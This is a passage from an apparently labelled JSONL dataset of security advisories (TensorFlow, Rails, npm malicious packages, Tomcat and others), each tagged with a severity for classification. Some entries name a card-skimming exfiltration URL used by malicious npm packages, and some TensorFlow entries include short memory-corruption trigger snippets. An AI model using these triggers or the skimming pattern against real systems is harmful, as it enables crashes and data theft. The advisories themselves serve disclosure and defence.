"text_raw": "High severity vulnerability that affects Microsoft.ChakraCore\n\n[Severity: HIGH]\n\nA remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-0611.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2019-04-09", "split": "train"} -{"id": "9f91dfbb4092e9882ed5", "text": "Wowza Streaming Engine 4.5.0 CSRF Add Advanced Admin Exploit", "text_raw": "Wowza Streaming Engine 4.5.0 CSRF Add Advanced Admin Exploit\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2016-07-19", "split": "train"} -{"id": "c7c8e35db08796ceda4a", "text": "Malicious Package in awesome_react_utility\n\nVersion 1.0.2 of `awesome_react_utility` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`\n\n## Recommendation\n\nIf version 1.0.2 of this module is found installed you will want to replace it with a version before or after 1.0.2. In addition to replacing the installed module, you will also want to evaluate your application to determine whether or not user data was compromised.", "text_raw": "Malicious Package in awesome_react_utility\n\n[Severity: CRITICAL]\n\nVersion 1.0.2 of `awesome_react_utility` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`\n\n\n## Recommendation\n\nIf version 1.0.2 of this module is found installed you will want to replace it with a version before or after 1.0.2. In addition to replacing the installed module, you will also want to evaluate your application to determine whether or not user data was compromised.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-01", "split": "train"} -{"id": "64f078498484d4b71082", "text": "`SparseFillEmptyRows` heap OOB\n\n### Impact\nThe [implementation](https://github.com/tensorflow/tensorflow/blob/e71b86d47f8bc1816bf54d7bddc4170e47670b97/tensorflow/core/kernels/sparse_fill_empty_rows_op.cc#L194-L241) of `SparseFillEmptyRows` can be made to trigger a heap OOB access:\n\n```python\nimport tensorflow as tf\n\ndata=tf.raw_ops.SparseFillEmptyRows(\n indices=[[0,0],[0,0],[0,0]],\n values=['sssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss'],\n dense_shape=[5,3],\n default_value='o')\n```\n\nThis occurs whenever the size of `indices` does not match the size of `values`.\n\n### Patches\nWe have patched the issue in GitHub commit [67bfd9feeecfb3c61d80f0e46d89c170fbee682b](https://github.com/tensorflow/tensorflow/commit/67bfd9feeecfb3c61d80f0e46d89c170fbee682b).\n\nThe fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by members of the Aivul Team from Qihoo 360.", "text_raw": "`SparseFillEmptyRows` heap OOB\n\n[Severity: MEDIUM]\n\n### Impact\nThe [implementation](https://github.com/tensorflow/tensorflow/blob/e71b86d47f8bc1816bf54d7bddc4170e47670b97/tensorflow/core/kernels/sparse_fill_empty_rows_op.cc#L194-L241) of `SparseFillEmptyRows` can be made to trigger a heap OOB access:\n\n```python\nimport tensorflow as tf\n \ndata=tf.raw_ops.SparseFillEmptyRows(\n indices=[[0,0],[0,0],[0,0]],\n values=['sssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss'],\n dense_shape=[5,3],\n default_value='o')\n```\n \nThis occurs whenever the size of `indices` does not match the size of `values`.\n\n### Patches\nWe have patched the issue in GitHub commit [67bfd9feeecfb3c61d80f0e46d89c170fbee682b](https://github.com/tensorflow/tensorflow/commit/67bfd9feeecfb3c61d80f0e46d89c170fbee682b).\n\nThe fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by members of the Aivul Team from Qihoo 360.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-11-10", "split": "train"} -{"id": "86956bdaa3df83c5defb", "text": "Path Traversal in Action View\n\n# File Content Disclosure in Action View\n\nImpact \n------ \nThere is a possible file content disclosure vulnerability in Action View. Specially crafted accept headers in combination with calls to `render file:` can cause arbitrary files on the target server to be rendered, disclosing the file contents.\n\nThe impact is limited to calls to `render` which render file contents without a specified accept format. Impacted code in a controller looks something like this:\n\n``` ruby\nclass UserController < ApplicationController \n def index \n render file: \"#{Rails.root}/some/file\" \n end \nend \n```\n\nRendering templates as opposed to files is not impacted by this vulnerability.\n\nAll users running an affected release should either upgrade or use one of the workarounds immediately.\n\nReleases \n-------- \nThe 6.0.0.beta3, 5.2.2.1, 5.1.6.2, 5.0.7.2, and 4.2.11.1 releases are available at the normal locations.\n\nWorkarounds \n----------- \nThis vulnerability can be mitigated by specifying a format for file rendering, like this:\n\n``` ruby\nclass UserController < ApplicationController \n def index \n render file: \"#{Rails.root}/some/file\", formats: [:html] \n end \nend \n```\n\nIn summary, impacted calls to `render` look like this:\n\n``` \nrender file: \"#{Rails.root}/some/file\" \n```\n\nThe vulnerability can be mitigated by changing to this:\n\n``` \nrender file: \"#{Rails.root}/some/file\", formats: [:html] \n```\n\nOther calls to `render` are not impacted.\n\nAlternatively, the following monkey patch can be applied in an initializer:\n\n``` ruby\n$ cat config/initializers/formats_filter.rb \n# frozen_string_literal: true\n\nActionDispatch::Request.prepend(Module.new do \n def formats \n super().select do |format| \n format.symbol || format.ref == \"*/*\" \n end \n end \nend) \n```\n\nCredits \n------- \nThanks to John Hawthorn of GitHub", "text_raw": "Path Traversal in Action View\n\n[Severity: HIGH]\n\n# File Content Disclosure in Action View\n\nImpact \n------ \nThere is a possible file content disclosure vulnerability in Action View. Specially crafted accept headers in combination with calls to `render file:` can cause arbitrary files on the target server to be rendered, disclosing the file contents. \n\nThe impact is limited to calls to `render` which render file contents without a specified accept format. Impacted code in a controller looks something like this: \n\n``` ruby\nclass UserController < ApplicationController \n def index \n render file: \"#{Rails.root}/some/file\" \n end \nend \n``` \n\nRendering templates as opposed to files is not impacted by this vulnerability. \n\nAll users running an affected release should either upgrade or use one of the workarounds immediately. \n\nReleases \n-------- \nThe 6.0.0.beta3, 5.2.2.1, 5.1.6.2, 5.0.7.2, and 4.2.11.1 releases are available at the normal locations. \n\nWorkarounds \n----------- \nThis vulnerability can be mitigated by specifying a format for file rendering, like this: \n\n``` ruby\nclass UserController < ApplicationController \n def index \n render file: \"#{Rails.root}/some/file\", formats: [:html] \n end \nend \n``` \n\nIn summary, impacted calls to `render` look like this: \n\n``` \nrender file: \"#{Rails.root}/some/file\" \n``` \n\nThe vulnerability can be mitigated by changing to this: \n\n``` \nrender file: \"#{Rails.root}/some/file\", formats: [:html] \n``` \n\nOther calls to `render` are not impacted. \n\nAlternatively, the following monkey patch can be applied in an initializer: \n\n``` ruby\n$ cat config/initializers/formats_filter.rb \n# frozen_string_literal: true \n\nActionDispatch::Request.prepend(Module.new do \n def formats \n super().select do |format| \n format.symbol || format.ref == \"*/*\" \n end \n end \nend) \n``` \n\nCredits \n------- \nThanks to John Hawthorn of GitHub", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2019-03-13", "split": "train"} -{"id": "90236ab97ce328ad9ef0", "text": "Heap buffer overflow in `BandedTriangularSolve`\n\n### Impact\nAn attacker can trigger a heap buffer overflow in Eigen implementation of `tf.raw_ops.BandedTriangularSolve`:\n\n```python\nimport tensorflow as tf\nimport numpy as np\n\nmatrix_array = np.array([])\nmatrix_tensor = tf.convert_to_tensor(np.reshape(matrix_array,(0,1)),dtype=tf.float32)\nrhs_array = np.array([1,1])\nrhs_tensor = tf.convert_to_tensor(np.reshape(rhs_array,(1,2)),dtype=tf.float32)\ntf.raw_ops.BandedTriangularSolve(matrix=matrix_tensor,rhs=rhs_tensor)\n```\n\nThe [implementation](https://github.com/tensorflow/tensorflow/blob/eccb7ec454e6617738554a255d77f08e60ee0808/tensorflow/core/kernels/linalg/banded_triangular_solve_op.cc#L269-L278) calls `ValidateInputTensors` for input validation but fails to validate that the two tensors are not empty:\n\n```cc\nvoid ValidateInputTensors(OpKernelContext* ctx, const Tensor& in0, const Tensor& in1) {\n OP_REQUIRES(\n ctx, in0.dims() >= 2, \n errors::InvalidArgument(\"In[0] ndims must be >= 2: \", in0.dims()));\n\nOP_REQUIRES(\n ctx, in1.dims() >= 2,\n errors::InvalidArgument(\"In[1] ndims must be >= 2: \", in1.dims()));\n}\n```\n\nFurthermore, since `OP_REQUIRES` macro only stops execution of current function after setting `ctx->status()` to a non-OK value, callers of helper functions that use `OP_REQUIRES` must check value of `ctx->status()` before continuing. This doesn't happen [in this op's implementation](https://github.com/tensorflow/tensorflow/blob/eccb7ec454e6617738554a255d77f08e60ee0808/tensorflow/core/kernels/linalg/banded_triangular_solve_op.cc#L219), hence the validation that is present is also not effective.\n\n### Patches\nWe have patched the issue in GitHub commit [ba6822bd7b7324ba201a28b2f278c29a98edbef2](https://github.com/tensorflow/tensorflow/commit/ba6822bd7b7324ba201a28b2f278c29a98edbef2) followed by GitHub commit [0ab290774f91a23bebe30a358fde4e53ab4876a0](https://github.com/tensorflow/tensorflow/commit/0ab290774f91a23bebe30a358fde4e53ab4876a0).\n\nThe fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by Ye Zhang and Yakun Zhang of Baidu X-Team.", "text_raw": "Heap buffer overflow in `BandedTriangularSolve`\n\n[Severity: LOW]\n\n### Impact\nAn attacker can trigger a heap buffer overflow in Eigen implementation of `tf.raw_ops.BandedTriangularSolve`:\n\n```python\nimport tensorflow as tf\nimport numpy as np\n \nmatrix_array = np.array([])\nmatrix_tensor = tf.convert_to_tensor(np.reshape(matrix_array,(0,1)),dtype=tf.float32)\nrhs_array = np.array([1,1])\nrhs_tensor = tf.convert_to_tensor(np.reshape(rhs_array,(1,2)),dtype=tf.float32)\ntf.raw_ops.BandedTriangularSolve(matrix=matrix_tensor,rhs=rhs_tensor)\n```\n\nThe [implementation](https://github.com/tensorflow/tensorflow/blob/eccb7ec454e6617738554a255d77f08e60ee0808/tensorflow/core/kernels/linalg/banded_triangular_solve_op.cc#L269-L278) calls `ValidateInputTensors` for input validation but fails to validate that the two tensors are not empty:\n \n```cc\nvoid ValidateInputTensors(OpKernelContext* ctx, const Tensor& in0, const Tensor& in1) {\n OP_REQUIRES(\n ctx, in0.dims() >= 2, \n errors::InvalidArgument(\"In[0] ndims must be >= 2: \", in0.dims()));\n\n OP_REQUIRES(\n ctx, in1.dims() >= 2,\n errors::InvalidArgument(\"In[1] ndims must be >= 2: \", in1.dims()));\n}\n``` \n\nFurthermore, since `OP_REQUIRES` macro only stops execution of current function after setting `ctx->status()` to a non-OK value, callers of helper functions that use `OP_REQUIRES` must check value of `ctx->status()` before continuing. This doesn't happen [in this op's implementation](https://github.com/tensorflow/tensorflow/blob/eccb7ec454e6617738554a255d77f08e60ee0808/tensorflow/core/kernels/linalg/banded_triangular_solve_op.cc#L219), hence the validation that is present is also not effective.\n\n### Patches\nWe have patched the issue in GitHub commit [ba6822bd7b7324ba201a28b2f278c29a98edbef2](https://github.com/tensorflow/tensorflow/commit/ba6822bd7b7324ba201a28b2f278c29a98edbef2) followed by GitHub commit [0ab290774f91a23bebe30a358fde4e53ab4876a0](https://github.com/tensorflow/tensorflow/commit/0ab290774f91a23bebe30a358fde4e53ab4876a0).\n\nThe fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by Ye Zhang and Yakun Zhang of Baidu X-Team.", "severity": "low", "severity_label": 0, "source": "github_advisory", "timestamp": "2021-05-21", "split": "train"} -{"id": "647c3a8046643c7a7460", "text": "Microsoft Netlogon Privilege Escalation Vulnerability\n\nAffected: Microsoft Netlogon\n\nMicrosoft's Netlogon Remote Protocol (MS-NRPC) contains a privilege escalation vulnerability when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller. An attacker who successfully exploits the vulnerability could run a specially crafted application on a device on the network. The vulnerability is also known under the moniker of Zerologon.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\nCWE(s): CWE-330\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "Microsoft Netlogon Privilege Escalation Vulnerability\n\nAffected: Microsoft Netlogon\n\nMicrosoft's Netlogon Remote Protocol (MS-NRPC) contains a privilege escalation vulnerability when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller. An attacker who successfully exploits the vulnerability could run a specially crafted application on a device on the network. The vulnerability is also known under the moniker of Zerologon.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\nCWE(s): CWE-330\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-11-03", "split": "train"} -{"id": "6207130b6bc6fe60614e", "text": "Arbitrary Code Execution in grunt\n\nThe package grunt before 1.3.0 are vulnerable to Arbitrary Code Execution due to the default usage of the function load() instead of its secure replacement safeLoad() of the package js-yaml inside grunt.file.readYAML.", "text_raw": "Arbitrary Code Execution in grunt\n\n[Severity: HIGH]\n\nThe package grunt before 1.3.0 are vulnerable to Arbitrary Code Execution due to the default usage of the function load() instead of its secure replacement safeLoad() of the package js-yaml inside grunt.file.readYAML.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-05-06", "split": "train"} -{"id": "d44075a8cfb5650027cc", "text": "Downloads Resources over HTTP in selenium-portal\n\nAffected versions of `selenium-portal` insecurely download an executable over an unencrypted HTTP connection.\n\nIn scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `selenium-portal`.\n\n## Recommendation\n\nNo patch is currently available for this vulnerability, and the package has not seen an update since 2014.\n\nThe best mitigation is currently to avoid using this package, using a different package if available.\n\nAlternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.", "text_raw": "Downloads Resources over HTTP in selenium-portal\n\n[Severity: HIGH]\n\nAffected versions of `selenium-portal` insecurely download an executable over an unencrypted HTTP connection. \n\nIn scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `selenium-portal`.\n\n\n## Recommendation\n\nNo patch is currently available for this vulnerability, and the package has not seen an update since 2014.\n\nThe best mitigation is currently to avoid using this package, using a different package if available. \n\nAlternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2019-02-18", "split": "train"} -{"id": "62e006a124269d88bde8", "text": "SQLAlchemy is vulnerable to SQL Injection via group_by parameter\n\nSQLAlchemy 1.2.17 has SQL Injection when the group_by parameter can be controlled.", "text_raw": "SQLAlchemy is vulnerable to SQL Injection via group_by parameter \n\n[Severity: CRITICAL]\n\nSQLAlchemy 1.2.17 has SQL Injection when the group_by parameter can be controlled.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2019-04-16", "split": "train"} -{"id": "94226b7d957fef2f8460", "text": "NanoHTTPD Cross-site Scripting vulnerability\n\nAn issue was discovered in RouterNanoHTTPD.java in NanoHTTPD through 2.3.1. The GeneralHandler class implements a basic GET handler that prints debug information as an HTML page. Any web server that extends this class without implementing its own GET handler is vulnerable to reflected XSS, because the GeneralHandler GET handler prints user input passed through the query string without any sanitization.", "text_raw": "NanoHTTPD Cross-site Scripting vulnerability\n\n[Severity: MEDIUM]\n\nAn issue was discovered in RouterNanoHTTPD.java in NanoHTTPD through 2.3.1. The GeneralHandler class implements a basic GET handler that prints debug information as an HTML page. Any web server that extends this class without implementing its own GET handler is vulnerable to reflected XSS, because the GeneralHandler GET handler prints user input passed through the query string without any sanitization.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-02-25", "split": "train"} -{"id": "a89d2bd102238b292d82", "text": "Netflix/Priam: Temporary Directory Information Disclosure\n\n### Impact\n\nWhen `File.createTempFile` creates a file, the permissions on that file are -rw-r--r--. This means that other users can read the contents of these files after they are written, although they can not modify the contents. This allows for local information disclosure if these files contain sensitive information.\n\nVulnerable locations:\n - https://github.com/Netflix/Priam/blob/362660bb7ebddb0cfa756a282d94678f65af9f06/priam/src/main/java/com/netflix/priam/backup/MetaData.java#L106-L111\n - https://github.com/Netflix/Priam/blob/362660bb7ebddb0cfa756a282d94678f65af9f06/priam/src/main/java/com/netflix/priam/identity/DoubleRing.java#L109-L118\n - https://github.com/Netflix/Priam/blob/362660bb7ebddb0cfa756a282d94678f65af9f06/priam/src/main/java/com/netflix/priam/restore/PostRestoreHook.java#L80-L86\n\n---\n\nThe custom CodeQL queries leveraged to find these this as well as their results can be found here:\n\nhttps://lgtm.com/query/1543383251073929777/\nhttps://lgtm.com/query/3142895023158674709/\n\n## Official Disclosure\n\nhttps://github.com/Netflix/security-bulletins/blob/master/advisories/nflx-2021-002.md\n\n## Fix\n\nThere are no fixed versions.", "text_raw": "Netflix/Priam: Temporary Directory Information Disclosure\n\n[Severity: MEDIUM]\n\n### Impact\n\nWhen `File.createTempFile` creates a file, the permissions on that file are -rw-r--r--. This means that other users can read the contents of these files after they are written, although they can not modify the contents. This allows for local information disclosure if these files contain sensitive information.\n\nVulnerable locations:\n - https://github.com/Netflix/Priam/blob/362660bb7ebddb0cfa756a282d94678f65af9f06/priam/src/main/java/com/netflix/priam/backup/MetaData.java#L106-L111\n - https://github.com/Netflix/Priam/blob/362660bb7ebddb0cfa756a282d94678f65af9f06/priam/src/main/java/com/netflix/priam/identity/DoubleRing.java#L109-L118\n - https://github.com/Netflix/Priam/blob/362660bb7ebddb0cfa756a282d94678f65af9f06/priam/src/main/java/com/netflix/priam/restore/PostRestoreHook.java#L80-L86\n\n---\n\nThe custom CodeQL queries leveraged to find these this as well as their results can be found here:\n\nhttps://lgtm.com/query/1543383251073929777/\nhttps://lgtm.com/query/3142895023158674709/\n\n## Official Disclosure\n\nhttps://github.com/Netflix/security-bulletins/blob/master/advisories/nflx-2021-002.md\n\n## Fix\n\nThere are no fixed versions.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-03-30", "split": "train"} -{"id": "9fe396459305273f1803", "text": "Malicious Package in react-server-native\n\nVersion 0.0.7 of `react-server-native` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`\n\n## Recommendation\n\nIf version 0.0.7 of this module is found installed you will want to replace it with a version before or after 0.0.7. In addition to replacing the installed module, you will also want to evaluate your application to determine whether or not user data was compromised.\n\nUsers may consider downgrading to version 0.0.6", "text_raw": "Malicious Package in react-server-native\n\n[Severity: CRITICAL]\n\nVersion 0.0.7 of `react-server-native` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`\n\n\n\n## Recommendation\n\nIf version 0.0.7 of this module is found installed you will want to replace it with a version before or after 0.0.7. In addition to replacing the installed module, you will also want to evaluate your application to determine whether or not user data was compromised.\n\nUsers may consider downgrading to version 0.0.6", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-01", "split": "train"} -{"id": "3af3297e4cfaee67f2b7", "text": "There is a XML external entity expansion (XXE) vulnerability in Apache Solr config files\n\nThis vulnerability in Apache Solr 6.0.0 to 6.6.3, 7.0.0 to 7.3.0 relates to an XML external entity expansion (XXE) in Solr config files (solrconfig.xml, schema.xml, managed-schema). In addition, Xinclude functionality provided in these config files is also affected in a similar way. The vulnerability can be used as XXE using file/ftp/http protocols in order to read arbitrary local files from the Solr server or the internal network. Users are advised to upgrade to either Solr 6.6.4 or Solr 7.3.1 releases both of which address the vulnerability. Once upgrade is complete, no other steps are required. Those releases only allow external entities and Xincludes that refer to local files / zookeeper resources below the Solr instance directory (using Solr's ResourceLoader); usage of absolute URLs is denied. Keep in mind, that external entities and XInclude are explicitly supported to better structure config files in large installations. Before Solr 6 this was no problem, as config files were not accessible through the APIs.", "text_raw": "There is a XML external entity expansion (XXE) vulnerability in Apache Solr config files\n\n[Severity: MEDIUM]\n\nThis vulnerability in Apache Solr 6.0.0 to 6.6.3, 7.0.0 to 7.3.0 relates to an XML external entity expansion (XXE) in Solr config files (solrconfig.xml, schema.xml, managed-schema). In addition, Xinclude functionality provided in these config files is also affected in a similar way. The vulnerability can be used as XXE using file/ftp/http protocols in order to read arbitrary local files from the Solr server or the internal network. Users are advised to upgrade to either Solr 6.6.4 or Solr 7.3.1 releases both of which address the vulnerability. Once upgrade is complete, no other steps are required. Those releases only allow external entities and Xincludes that refer to local files / zookeeper resources below the Solr instance directory (using Solr's ResourceLoader); usage of absolute URLs is denied. Keep in mind, that external entities and XInclude are explicitly supported to better structure config files in large installations. Before Solr 6 this was no problem, as config files were not accessible through the APIs.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2018-10-17", "split": "train"} -{"id": "45d010c6a8e5ddb22242", "text": "CHECK-fail in LSTM with zero-length input in TensorFlow\n\n### Impact\nRunning an LSTM/GRU model where the LSTM/GRU layer receives an input with zero-length results in a `CHECK` failure when using the CUDA backend.\n\nThis can result in a query-of-death vulnerability, via denial of service, if users can control the input to the layer.\n\n### Patches\nWe have patched the issue in GitHub commit [14755416e364f17fb1870882fa778c7fec7f16e3](https://github.com/tensorflow/tensorflow/commit/14755416e364f17fb1870882fa778c7fec7f16e3) and will release TensorFlow 2.4.0 containing the patch. TensorFlow nightly packages after this commit will also have the issue resolved.\n\nSince this issue also impacts TF versions before 2.4, we will patch all releases between 1.15 and 2.3 inclusive.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.", "text_raw": "CHECK-fail in LSTM with zero-length input in TensorFlow\n\n[Severity: MEDIUM]\n\n### Impact\nRunning an LSTM/GRU model where the LSTM/GRU layer receives an input with zero-length results in a `CHECK` failure when using the CUDA backend.\n\nThis can result in a query-of-death vulnerability, via denial of service, if users can control the input to the layer.\n\n### Patches\nWe have patched the issue in GitHub commit [14755416e364f17fb1870882fa778c7fec7f16e3](https://github.com/tensorflow/tensorflow/commit/14755416e364f17fb1870882fa778c7fec7f16e3) and will release TensorFlow 2.4.0 containing the patch. TensorFlow nightly packages after this commit will also have the issue resolved.\n\nSince this issue also impacts TF versions before 2.4, we will patch all releases between 1.15 and 2.3 inclusive.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2020-12-10", "split": "train"} -{"id": "06da30be8ed6b019c073", "text": "Downloads Resources over HTTP in install-g-test\n\nAffected versions of `install-g-test` insecurely download resources over HTTP.\n\n## Recommendation\n\nNo patch is currently available for this vulnerability.\n\nThe best mitigation is currently to avoid using this package, using a different package if available.\n\nAlternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.", "text_raw": "Downloads Resources over HTTP in install-g-test\n\n[Severity: HIGH]\n\nAffected versions of `install-g-test` insecurely download resources over HTTP. \n\nIn scenarios where an attacker has a privileged network position, they can modify or read such resources at will. While the exact severity of impact for a vulnerability like this is highly variable and depends on the behavior of the package itself, it ranges from being able to read sensitive information all the way up to and including remote code execution.\n\n\n## Recommendation\n\nNo patch is currently available for this vulnerability.\n\nThe best mitigation is currently to avoid using this package, using a different package if available. \n\nAlternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2019-02-18", "split": "train"} -{"id": "cdfd6d5137cf42a4ef2c", "text": "KVIrc 3.4.0 Virgo Remote Format String Exploit PoC", "text_raw": "KVIrc 3.4.0 Virgo Remote Format String Exploit PoC\n\nSeverity: high", "severity": "high", "severity_label": 2, "source": "zeroscience", "timestamp": "2008-10-24", "split": "train"} -{"id": "a6de8730aa41cdd5303e", "text": "Insufficiently Protected Credentials in Apache Tomcat\n\nWhen Apache Tomcat 9.0.0.M1 to 9.0.28, 8.5.0 to 8.5.47, 7.0.0 and 7.0.97 is configured with the JMX Remote Lifecycle Listener, a local attacker without access to the Tomcat process or configuration files is able to manipulate the RMI registry to perform a man-in-the-middle attack to capture user names and passwords used to access the JMX interface. The attacker can then use these credentials to access the JMX interface and gain complete control over the Tomcat instance.", "text_raw": "Insufficiently Protected Credentials in Apache Tomcat\n\n[Severity: HIGH]\n\nWhen Apache Tomcat 9.0.0.M1 to 9.0.28, 8.5.0 to 8.5.47, 7.0.0 and 7.0.97 is configured with the JMX Remote Lifecycle Listener, a local attacker without access to the Tomcat process or configuration files is able to manipulate the RMI registry to perform a man-in-the-middle attack to capture user names and passwords used to access the JMX interface. The attacker can then use these credentials to access the JMX interface and gain complete control over the Tomcat instance.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2019-12-26", "split": "train"} -{"id": "d427de06254ffc4234ff", "text": "Double free in arenavec\n\nAffected versions of this crate did not guard against potential panics that may happen from user-provided functions T::default() and T::drop().\n\nPanic within T::default() leads to dropping uninitialized T, when it is invoked from common::Slice::::new(). Panic within T::drop() leads to double drop of T, when it is invoked either from common::SliceVec::::resize_with() or common::SliceVec::::resize()\n\nEither case causes memory corruption in the heap memory.", "text_raw": "Double free in arenavec\n\n[Severity: HIGH]\n\nAffected versions of this crate did not guard against potential panics that may happen from user-provided functions T::default() and T::drop().\n\nPanic within T::default() leads to dropping uninitialized T, when it is invoked from common::Slice::::new(). Panic within T::drop() leads to double drop of T, when it is invoked either from common::SliceVec::::resize_with() or common::SliceVec::::resize()\n\nEither case causes memory corruption in the heap memory.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "f2b53e8d4e0d76fec214", "text": "Subrion CMS 2.2.1 CSRF Add Admin Exploit", "text_raw": "Subrion CMS 2.2.1 CSRF Add Admin Exploit\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2012-09-11", "split": "train"} -{"id": "3b70b158ff0aeb58535f", "text": "Process crashes when the cell used as DepGroup is not alive\n\n### Impact\n\nIt's easy to create a malign transaction which uses the dead cell as the DepGroup in the DepCells. The transaction can crash all the receiving nodes.", "text_raw": "Process crashes when the cell used as DepGroup is not alive\n\n[Severity: CRITICAL]\n\n### Impact\n\nIt's easy to create a malign transaction which uses the dead cell as the DepGroup in the DepCells. The transaction can crash all the receiving nodes.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "d4a4a99bd79cf758824a", "text": "Malicious Package in crpyto-js\n\nAll versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.\n\n## Recommendation\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.\n\nThe package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", "text_raw": "Malicious Package in crpyto-js\n\n[Severity: CRITICAL]\n\nAll versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.\n\n\n## Recommendation\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.\n\nThe package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-03", "split": "train"} -{"id": "62be119f60d7cfc53a01", "text": "SetSeed CMS 5.8.20 (loggedInUser) Remote SQL Injection Vulnerability", "text_raw": "SetSeed CMS 5.8.20 (loggedInUser) Remote SQL Injection Vulnerability\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2011-11-02", "split": "train"} -{"id": "0c43f66c9fcb5192c5ec", "text": "Command Injection in Limdu\n\n### Impact\nThe `trainBatch` function has a command injection vulnerability. Clients of the Limdu library are unlikely to be aware of this, so they might unwittingly write code that contains a vulnerability.\n\n### Patches\nPatched in version 0.9.5.\n\n### Workarounds\nDo not use trainBatch with classifiers that rely on shell execution, such as SVM Perf, SVM Linear or Adaboost\n\n### References\nNo", "text_raw": "Command Injection in 